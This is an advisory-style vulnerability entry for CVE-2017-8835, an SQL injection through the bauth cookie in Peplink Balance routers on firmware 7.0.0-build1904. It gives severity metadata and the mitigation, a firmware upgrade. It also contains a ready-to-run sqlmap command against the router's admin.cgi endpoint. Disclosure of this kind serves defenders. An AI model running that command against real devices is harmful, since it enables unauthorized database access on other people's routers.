vendor:
Balance Routers 305, 380, 580, 710, 1350, 2500
by:
X41 D-Sec GmbH, Eric Sesterhenn
9,8
CVSS
CRITICAL
SQL Injection via bauth Cookie
89
CWE
Product Name: Balance Routers 305, 380, 580, 710, 1350, 2500
Affected Version From: 7.0.0-build1904
Affected Version To: 7.0.0-build1904
Patch Exists: YES
Related CWE: CVE-2017-8835
CPE: h:peplink:balance_routers_305,_380,_580,_710,_1350,_2500
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017
Multiple Vulnerabilities in peplink balance routers
Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command: ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log -v 3
Mitigation:
Upgrade to the latest firmware version.
